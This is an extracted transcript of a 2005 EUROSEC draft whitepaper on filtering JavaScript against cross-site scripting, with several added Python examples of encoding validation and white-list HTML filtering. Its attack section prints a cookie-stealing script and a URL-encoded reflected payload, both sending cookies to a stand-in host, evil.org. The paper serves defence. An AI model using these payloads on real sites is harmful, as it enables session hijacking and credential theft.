051207b eurosec draft whitepaper filtering javascript

Upload: anonymous-s3tzbvws1

Post on 28-Feb-2018

221 views

Category:

Documents


0 download

TRANSCRIPT

  • 7/25/2019 051207b EUROSEC Draft Whitepaper Filtering JavaScript

    1/31

    Filtering JavaScript to Prevent Cross-Site Scripting

    secologic Project

    Created by:

    EUROSEC GmbH Chiffriertechnik & Sicherheit

    Sodener Strasse 82 A, D-61476 Kronberg, Germany

    © 2005, EUROSEC GmbH Chiffriertechnik & Sicherheit

    Version  Author  Date            Notes
    1.0              01.0[…].2005    Draft Version

    File Name: 3226800.doc

    Abstract

    Cross-Site Scripting is one of the main problems of any Web-based service. Since Web browsers support the execution of commands embedded in Web pages to enable dynamic Web pages, attackers can make use of this feature to enforce the execution of malicious code in a user's Web browser. JavaScript is the most commonly used command language in this context. Filtering malicious JavaScript code is necessary for any Web application. This paper describes the overall problem and elaborates on the possibilities to filter JavaScript in Web applications. Also a filtering architecture is presented that allows Web application developers to filter JavaScript depending on the application need to reduce the danger of successful Cross-Site Scripting attacks.

    Table of Content


    1 Introduction

    […] not distinguish between the languages and concentrates on the JavaScript language. The most important feature of JavaScript is the possibility to interact with the browser to influence the HTML document displayed and also influence the browser itself. The interaction possibilities differ depending on the browser product. Beside a common set of functions that allow document and browser manipulation, additional proprietary functions may be available. The interface and function names also slightly differ from browser to browser, making it hard for Web application developers to write code that is compatible with any browser type or version.

    From a security point of view JavaScript's main functionality of manipulating HTML documents currently loaded into the browser and manipulating the browser itself is critical if misused by attackers. Therefore security aware Web applications should not make use of JavaScript or must implement countermeasures to prevent its misuse. Unfortunately today's Web application designers feel a pressing need for stylish GUI designs that require excessive use of JavaScript. Also Web application frameworks are used that are based on JavaScript for client side GUI rendering. Often developers even don't know that JavaScript code is automatically inserted into Web documents. […]er can be used to indicate that JavaScript code follows:

    javascript:alert("popup window");

    Such code normally is executed by the browser immediately when detected in the page. […]ne functions that are not executed directly and can be called later on. Function definitions can occur wherever the JavaScript code is inserted. To allow modularization of code it is possible to put code parts in separate files that can be loaded using the optional src parameter of the script begin tag as in the following example:

    […]

    The browser loads the script code using the uniform resource locator (URL) and interprets the content retrieved. Normal statements are executed directly and execution of statements within function definitions is deferred until the function is called.

    Calling JavaScript functions is supported at many locations inside an HTML document. […]c events occur such as initial load of the document as the following example shows:

    […]

    […]ned in prior JavaScript environments is called when the page containing the tag above is loaded. Other examples of event related parameters are:

    - onClick for the HTML tags button, checkbox, radio, link, reset, submit

    - onChange for the HTML tags select, text, textarea

    - onSubmit for the HTML tag submit button within a form environment

    - onMouseOver for any HTML tag.

    […]ned locations within an HTML document but can occur nearly everywhere.

    […] displayed by the browser with JavaScript or to influence the operation of the browser itself are dangerous features if misused. The misuse potential directly relates to the functions available for a malicious programmer. Unfortunately JavaScript provides full access to HTML documents using the document object model (DOM). A script therefore can modify at least the document it is residing in arbitrarily; it is also possible to completely delete the document and create a totally different document. From an attacker's point of view two things are of special interest: cookies associated to a document and access credentials. JavaScript also provides access possibilities to this information. The cookies associated to a document can be accessed using the function call document.cookie, and application level access credentials are often acquired using form based login. Here the credentials are input into input fields residing in a form environment. Since the form is part of the document, a script can access all information in all fields or can simply modify the target URL of the form. Then the credentials are sent to the new target, which is under the control of the attacker.

    These few examples show that JavaScript's native functions provide all possibilities for attackers, if malicious script code can be inserted into an HTML document. To prevent that script code contained in a document loaded from some Web site accesses documents loaded from some other Web site, browsers do not allow access between documents loaded from different sites (i.e. cross-site access). Therefore attackers use other techniques to implement a cross-site attack.

    document.location = "http://evil.org/steal.cgi?c=" + escape(document.cookie);

    To attract the attention of other users the message headline is chosen appropriately.

    - Any other user that is selecting this message is attacked, since the user's browser executes the script, which instructs the browser to load a new document from the attacker's server using a URL that is transmitting the user's cookie to the server.

    - The attacker can now make use of the cookie to act under the identity of the attacked users. Attack and damage possibilities depend on the environment the attack is placed in.

    Well performed attacks use sophisticated code that will not provide any attack indication such as visible redirects or page distortion.

    Reflected attacks are used if the malicious code can not be stored at the server. […]cation. This means for example that the application is writing unmodified values of request input parameters into the new page delivered to the user.

    […] the attacker's site.

    Since URLs must not contain specific values such as a plain <, the script must be encoded using URL encoding that escapes such values. The decoding is performed at the server side automatically since parameter values are automatically URL encoded by the browser:

    http://victim.org/logon.page?username=%22%3E%3Cscript%3Edocument.forms%5B0%5D.action%3D%22http%3A%2F%2Fevil.org%2Fsteal.cgi%3Fc%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E%3C%22

    To further disguise the attack code the whole attack string could be encoded. […]rst. […]ltered² out.

    ² The more general concept is input validation.

    2 Filtering JavaScript

    Protection from malicious JavaScript code can be achieved at different locations. First, users can protect themselves by disabling JavaScript (or active content in general) in their browsers. Unfortunately this renders most of the modern Web sites unusable. Therefore Web applications must protect their users by filtering out malicious JavaScript.

    2.1 Filtering Input or Output?

    From a conceptional point of view, filtering JavaScript to prevent Cross-Site Scripting attacks can be performed on any data sent to an application as input, or can be performed on the output sent by the application to Web browsers, or both.

    While it is clear which data to consider as output, it often is unclear which data should be considered as input for a Web application. From a security point of view the whole HTTP request sent to a Web application must be considered input and not only the parameter values that are fed by users into HTML input fields.

    Malicious script code can not only be contained in the body of an HTTP request but also in the header. One must also take into account that the attack target is not a user of the application (as assumed so far in this paper) but the administrator looking at the Web server or application log with an HTML based tool. Then script code contained in header fields and stored in the log file may be executed and show its malicious effects. Thus all data entering the application must be considered untrusted and must be checked for malicious JavaScript code.

    Beside the direct input by client request, developers of a Web application must also consider other information sources from which data is read or imported generally as untrusted. Consider the following scenario:


    Trusted, untrusted, and tainted input and output

    A Web application is treating user requests as untrusted input, but also reads data from an internal database. Since the database is internal, the developer treats the data as trusted input not requiring filtering. Unfortunately the data is inserted into the database by another Web application that reads the data from external clients. Therefore the data in the database must be considered tainted since parts of it may stem from untrusted sources. This motivates that literally all data flowing into an application must be filtered.

    The same may be true for data sent as application output to the client. Since this data may be a mix between trusted, untrusted, and tainted data it is a good idea to filter output also. This also prevents problems if data sources that are considered trusted are found to be compromised for any reason. Since filtering has an impact on the performance, one would not generally filter all output data in situations where mass data is processed but only parts that do not stem from trusted sources. […]ltered that are not generated by the application itself. […]ltered.


    Filtering Untrusted Output Parts

    Normally a Web application generated HTML document is constructed from different building blocks, so that trusted and untrusted parts can be differentiated. The situation is made more complex if external libraries are used to generate parts of the output or underlying frameworks generate the whole output. […]rst case the library's output must be considered input and treated according to the trust in the library. […]ltering that the parts under its control do not contain malicious script code.

    […]ltering and output filtering.

    2.2 How to Filter JavaScript?

    To prevent Cross-Site Scripting attacks a simple task has to be performed for input filtering: any JavaScript code in the input must be transformed in a way that it is not executed by a browser if sent to it.

    2.2.1 Input Filtering


    Depending on the Web application it may not be suitable to simply delete all JavaScript code during input filtering, since the application may be forum software used to implement a developer forum with discussions on JavaScript code. Therefore script code must not be deleted from forum messages.


    2.2.2 Output Filtering

    Similar situations arise when filtering output: if an application itself is using JavaScript in its HTML documents it is not a good idea to remove any script code in the final HTML documents before it is sent to the user's browser. Therefore filtering as described above must be performed selectively for untrusted or tainted output parts.

    2.2.3 What to Filter?

    When it comes to filtering there are in general two potential approaches:

    - Black-List filtering

    - White-List filtering

    With Black-List filtering the data to be filtered is searched for forbidden patterns that are specified in the Black-List. While this approach allows easy configuration of filters, it has the big disadvantage that negative lists tend to be not complete. […]lter is not able to detect and prevent the attack.

    […]ltering the allowed patterns are specified. Therefore if new attack patterns are used they most probably do not match any of the allowed patterns, if these patterns were constructed carefully. While using positive lists provides good protection from attacks, they can be hard to specify depending on the application use case. The good news is that most Web applications are relatively simple with respect to the input expected, so that white list definition is simple in many cases also. Another feature of White-Lists is that if new tags are available they explicitly must be included into the list, thus a sound decision can be made before the new tag is processed by the application. This also increases the overall security. Because of its security shortcomings Black-List filtering will not be considered in the following.

    […]ltering. They are:

    - […]

    […] entities.

    Please note that applications may make use of different filter strategies for input and output filtering. As for example the application does not expect any HTML code including script code in its input parameters, strict filtering is performed on input values. […]lter. When using White-List filtering, application designers and developers must decide on the structure of the HTML output created by the application. […]ned, which tags are allowed in the output. Depending on the application, different tags may be allowed in the output of different parts of the application. Therefore several White-Lists may be used within one application.


    The following table shows which HTML tags must be considered potentially dangerous because of their ability to contain or reference executable code:

    HTML-Tag | Use | Risk | N S C R

    (Only fragments of the table rows survived extraction; the recoverable entries are listed below.)

    - lowsrc: file to be used in styles; risk: code execution using javascript protocol.

    - style, binding: url(...): almost any tag; URL link to file to be used in styles; risk: code execution using javascript protocol.

    - style, width: expression(...): almost any tag; executable code, e.g. a JavaScript expression to dynamically adjust the tag width inside styles; risk: code execution.

    - content: url(...): risk: code execution.

    - META: URL link to other HTML document; risk: code execution using javascript protocol.

    What a White-List used for filtering in general does is to describe which tags, which tag properties, and which values for properties are allowed in the data stream that is to be filtered.

    When analyzing the different tags, tag properties and associated threat potential, the following White-List classes can be identified that implement different restriction policies when used in applications:

    - nonHTML White-List: the input must not contain any HTML markup. A filter with this configuration will transform all HTML markup into the text representation by using […]

    - secureHTML White-List: the input is allowed to contain secure HTML markup. All tags or properties allowing code execution, URLs or implementing references (such as anchor tags) are not allowed.

    - exposedHTML White-List: the input is allowed to contain also HTML markup that requires the specification of a URL, such as image tags. Here the URLs can be restricted according to the allowed protocols and the file extensions listed.

    Any further allowance will yield unsecure HTML data since, for example, script tags would be allowed.

    Please note that it is important to which parts of the input or output data the different configured filters are applied. Of course it would be no good idea to run the nonHTML White-List on the final output to be sent to a browser if the application is using JavaScript itself for some functionality.

    2.3 The Character Encoding Problem

    Filtering for JavaScript means scanning a data stream for specific string patterns considered dangerous and then taking appropriate actions like transformation or deletion. Unfortunately there are many character encodings available that are used to represent foreign language characters. The character encoding of the input data for a Web application is normally indicated in the request header generated by the client browser. Unfortunately this is untrusted information, which can be used by attackers to mislead the application or the JavaScript filter used. Therefore the first step in filtering JavaScript is to normalize the input data to a specific character encoding. Since national encodings are not suited to provide a uniform encoding base, Unicode should be used instead. Unfortunately there are several Unicode encoding schemas available. UTF-8 is the most commonly used. Since UTF-8 is using a variable length encoding schema, additional actions must be taken to avoid the problem of illegal UTF-8 character encodings. This is for example the case if a character for which the encoding is one byte long is encoded using two or more bytes with the additional bytes set to zero. Nevertheless a simple filter would not match dangerous characters since the lengths of the character encodings differ. A JavaScript filter therefore must honor the character encoding and make sure that only valid encodings are accepted.
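    To make the normalization step concrete, the following is an added example (Python, not code from the paper or its Java filter): it decodes UTF-8 by hand so that the overlong check is visible, rejects overlong sequences and surrogates, and shows why a filter that pattern-matches the raw bytes misses a script tag whose < and > are encoded with two bytes each. The function names and all sample inputs are constructed for this illustration.

```python
# Added example (not the EUROSEC paper's code): validate and normalize the
# character encoding before pattern matching, rejecting overlong UTF-8.
# All inputs below are constructed for this illustration.

SCRIPT_PATTERN = "<script"


class InvalidUtf8(ValueError):
    """Raised by decode_utf8() when validation fails."""


def decode_utf8(data: bytes, strict: bool = True) -> str:
    """Hand-written UTF-8 decoder.

    strict=True  rejects overlong encodings (a code point written with more
                 bytes than necessary) and UTF-16 surrogates, as a filter must.
    strict=False accepts overlong forms; this models a lenient consumer and is
                 only here to show what a raw-byte pattern scan lets through.
    Malformed sequences and code points above U+10FFFF are always rejected.
    """
    out = []
    i, n = 0, len(data)
    while i < n:
        b0 = data[i]
        if b0 < 0x80:                        # 1-byte form (ASCII)
            cp, need, minimum = b0, 0, 0
        elif 0xC0 <= b0 <= 0xDF:             # 2-byte form, must be >= U+0080
            cp, need, minimum = b0 & 0x1F, 1, 0x80
        elif 0xE0 <= b0 <= 0xEF:             # 3-byte form, must be >= U+0800
            cp, need, minimum = b0 & 0x0F, 2, 0x800
        elif 0xF0 <= b0 <= 0xF7:             # 4-byte form, must be >= U+10000
            cp, need, minimum = b0 & 0x07, 3, 0x10000
        else:                                # stray continuation or 0xF8..0xFF
            raise InvalidUtf8(f"invalid lead byte 0x{b0:02x} at offset {i}")
        if i + need >= n:
            raise InvalidUtf8(f"truncated sequence at offset {i}")
        for k in range(1, need + 1):
            b = data[i + k]
            if b & 0xC0 != 0x80:
                raise InvalidUtf8(f"bad continuation byte at offset {i + k}")
            cp = (cp << 6) | (b & 0x3F)
        if cp > 0x10FFFF:
            raise InvalidUtf8(f"code point out of range at offset {i}")
        if strict and (cp < minimum or 0xD800 <= cp <= 0xDFFF):
            raise InvalidUtf8(f"overlong or surrogate encoding at offset {i}")
        out.append(chr(cp))
        i += need + 1
    return "".join(out)


def naive_contains_script(data: bytes) -> bool:
    """A filter that scans the raw bytes without normalizing first."""
    return SCRIPT_PATTERN.encode() in data.lower()


def check_input(data: bytes) -> str:
    """The paper's order of steps: validate and normalize the encoding, then
    scan the normalized text. Invalid encodings are rejected outright."""
    try:
        text = decode_utf8(data, strict=True)
    except InvalidUtf8 as err:
        return f"rejected: {err}"
    return "script" if SCRIPT_PATTERN in text.lower() else "clean"


# Constructed inputs: the same payload in plain UTF-8 and with '<' and '>'
# encoded overlong as C0 BC / C0 BE (two bytes for a one-byte character).
PLAIN = b"<script>alert(1)</script>"
OVERLONG = b"\xc0\xbcscript\xc0\xbealert(1)\xc0\xbc/script\xc0\xbe"
GERMAN = "Grüße aus Kronberg".encode("utf-8")   # valid multi-byte text

if __name__ == "__main__":
    print("naive byte scan, plain:   ", naive_contains_script(PLAIN))
    print("naive byte scan, overlong:", naive_contains_script(OVERLONG))
    print("lenient decode, overlong: ", decode_utf8(OVERLONG, strict=False))
    print("check_input, overlong:    ", check_input(OVERLONG))
    print("check_input, german:      ", check_input(GERMAN))
```

    The naive scan reports the plain payload but not the overlong one, while the lenient decode shows that a consumer accepting overlong forms would see the very same script tag; rejecting the input at the validation step, as check_input does, is what the paper's "only valid encodings are accepted" requirement amounts to.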

    Steps to Perform for Filtering

    For implementing JavaScript filters, languages that internally use a Unicode representation of strings are suited best, since they automatically transform national character set characters to the Unicode representation. This for example is true for the Java programming language, which is also often used to implement Web applications. Therefore the JavaScript filter described in the next chapter is implemented in Java.

    3 A Java based JavaScript Filter

    […]lter using the White-List schema described above is shortly introduced.

    3.1 Architecture

    To allow easy integration into Java based applications the filter provides a simple interface encapsulated in the class JavaScriptFilter. Except for the constructor public JavaScriptFilter(String filterConfigFile) that is called with a configuration file, only two methods are provided, allowing two different access ways to the filter:

    - the first method provides a Java stream-based Reader/Writer interface: public void filter(Reader filterInput, Writer filteredOutput)

    - the second method provides a String-based interface: public String filter(String filterInputString)

    An application may then create filter classes with as many configurations as needed, to perform appropriate input or output filtering.

    […]lter is using its own implementation of an HTML parser that is based on pattern matching. This was necessary since standard HTML/XML parser libraries cannot cope with malformed HTML input. The input first is analyzed using the HTML parser to build up the HTML object tree. Then the actual filtering is performed by a filter class that is using the filter table generated by the configuration file reader from the XML configuration file. Finally the filtered HTML input is returned to the application for further processing. The following picture shows the overall architecture:


    Overall Filter Architecture

    The configuration file is an XML file describing the allowed HTML tags, tag properties, and value patterns. The following shows a simple example, which describes that anchor tags are allowed to make use of the href property, which is restricted to the protocol descriptors HTTP and HTTPS, allows all kinds of file formats and allows the tag properties align, target and charset:

    (XML example; only the values a, href, HTTP, HTTPS, all, align, target and charset survived extraction.)
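    As an added example (Python, not the paper's Java JavaScriptFilter), the following implements the three White-List classes of section 2.2.3 (nonHTML, secureHTML, exposedHTML) as configurations for one filter whose configuration has the shape of the XML example above: tag, allowed property, and for URL properties the allowed protocols and file extensions. The class and function names, the contents of the three policies, the void and content-dropping tag sets and the sample input are all assumptions made for this illustration; the paper's filter removes undesired input, and this example does the same.

```python
# Added example, not the paper's Java JavaScriptFilter: a white-list HTML
# filter implementing the nonHTML / secureHTML / exposedHTML policies of
# section 2.2.3 with a configuration shaped like the XML example of 3.1
# (tag -> property -> allowed protocols and file extensions). The policy
# contents, names and the sample input are constructed for this example.
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# property rule: None = any value; dict = URL restricted to the listed
# protocols and file extensions ("all" = any file format)
NON_HTML = {}                                   # no markup allowed at all
SECURE_HTML = {"b": {}, "i": {}, "p": {}, "br": {}, "ul": {}, "li": {}}
EXPOSED_HTML = {
    **SECURE_HTML,
    "a": {"href": {"protocols": ("http", "https"), "extensions": "all"},
          "target": None, "charset": None},   # the paper's anchor example
    "img": {"src": {"protocols": ("http", "https"),
                    "extensions": (".gif", ".jpg", ".png")}, "alt": None},
}
VOID_TAGS = {"br", "img"}
DROP_CONTENT = {"script", "style"}             # their text is code, not user text


def url_allowed(value: str, rule: dict) -> bool:
    """Protocol and file-extension check for an absolute URL. A relative URL
    has no protocol and is rejected here (a design choice of this example)."""
    parts = urlsplit(value.strip())
    if parts.scheme.lower() not in rule["protocols"]:
        return False                            # also stops javascript: URLs
    if rule["extensions"] == "all":
        return True
    return any(parts.path.lower().endswith(ext) for ext in rule["extensions"])


class WhiteListFilter(HTMLParser):
    """Re-emits only granted tags and properties. html.parser tolerates
    malformed input (unclosed tags, stray '<') instead of failing."""

    def __init__(self, config: dict):
        super().__init__(convert_charrefs=False)
        self.config, self.out, self.skip = config, [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1                      # swallow the tag and its body
            return
        if self.skip:
            return
        allowed = self.config.get(tag)
        if allowed is None:                     # tag not granted: drop it,
            return                              # its text is still emitted
        kept = []
        for name, value in attrs:
            rule = allowed.get(name, "deny")    # event handlers are never listed
            if rule == "deny":
                continue
            if rule is not None and not (value and url_allowed(value, rule)):
                continue
            kept.append(f' {name}="{html.escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in self.config and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))

    def handle_entityref(self, name):
        if not self.skip:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self.skip:
            self.out.append(f"&#{name};")

    def handle_comment(self, data):
        pass                                    # comments can hide markup: drop


def filter_html(text: str, config: dict) -> str:
    """String interface in the spirit of the paper's filter(String). The empty
    nonHTML configuration turns every piece of markup into its entity
    representation; any other configuration parses and white-lists."""
    if not config:
        return html.escape(text, quote=False)
    parser = WhiteListFilter(config)
    parser.feed(text)
    parser.close()
    return "".join(parser.out)


# Constructed sample: event handler, script tag, javascript: link, plain
# HTTPS link, an allowed image and an image with a forbidden extension.
SAMPLE = ('<p onmouseover="alert(1)">Hi <b>there</b><script>alert(1)</script>'
          '<a href="javascript:alert(1)">x</a> '
          '<a href="https://example.org/page" target="_blank">ok</a>'
          '<img src="http://example.org/a.png"><img src="http://example.org/a.exe"></p>')

if __name__ == "__main__":
    for name, policy in (("nonHTML", NON_HTML), ("secureHTML", SECURE_HTML),
                         ("exposedHTML", EXPOSED_HTML)):
        print(name, "=>", filter_html(SAMPLE, policy))
```

    Run as a script it prints the sample under each policy: nonHTML yields only entity-encoded text, secureHTML keeps the paragraph and bold tags but drops the links and images, and exposedHTML keeps the HTTPS link and the PNG image while the javascript: href, the .exe image source, the event handler and the script element are removed. Which policy is applied to which part of the input or output remains the application's decision, as the paper notes.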


    Example Filter Configuration XML File

    The following section provides a short overview on the current functionality provided by the JavaScriptFilter implementation.

    3.2 Functionality

    Currently the JavaScriptFilter provides the following functionality:

    - The filter recognizes all HTML tags and is able to parse also malformed HTML.

    - The individual properties of HTML tags are recognized.

    - Only those tags and properties are allowed to pass the filter that are granted by the filter configuration.

    - For URL values the protocol and file type can be restricted.

    - Relative and absolute URLs are distinguished.

    Thus the filter implementation is providing the desired filter functionality. […]lter configurations have been defined to match the different restriction policies defined above.

    Several tests with HTML input from existing Web sites have been successfully performed: the output generated by the filter was as instructed by the configuration file. Of course the configuration can be adapted as needed by application developers.

    Currently the filter removes all undesired input, and the filter possibilities for the exposedHTML class are limited. Here further functions should be added, such as a transform possibility that replaces undesired tags with their display representation, or further filter possibilities for URLs.

    4 Summary

    Filtering JavaScript is important for the security of any Web application. The paper motivated that applications should perform input and output filtering to achieve an appropriate level of protection for their users. […]ltering is more secure than Black-List filtering.

    For implementing a JavaScript filter using the White-List approach, dangerous HTML entities allowing script execution must be identified. Since applications require different kinds of filtering, a filter must be configurable to the application's need. Here three classes of White-Lists for filter configurations have been shown.

    A Java-based implementation of such a configurable White-List filter has been performed and shortly described in this paper. Tests show satisfying filter results. The filter will be further developed to provide more filter functionality.
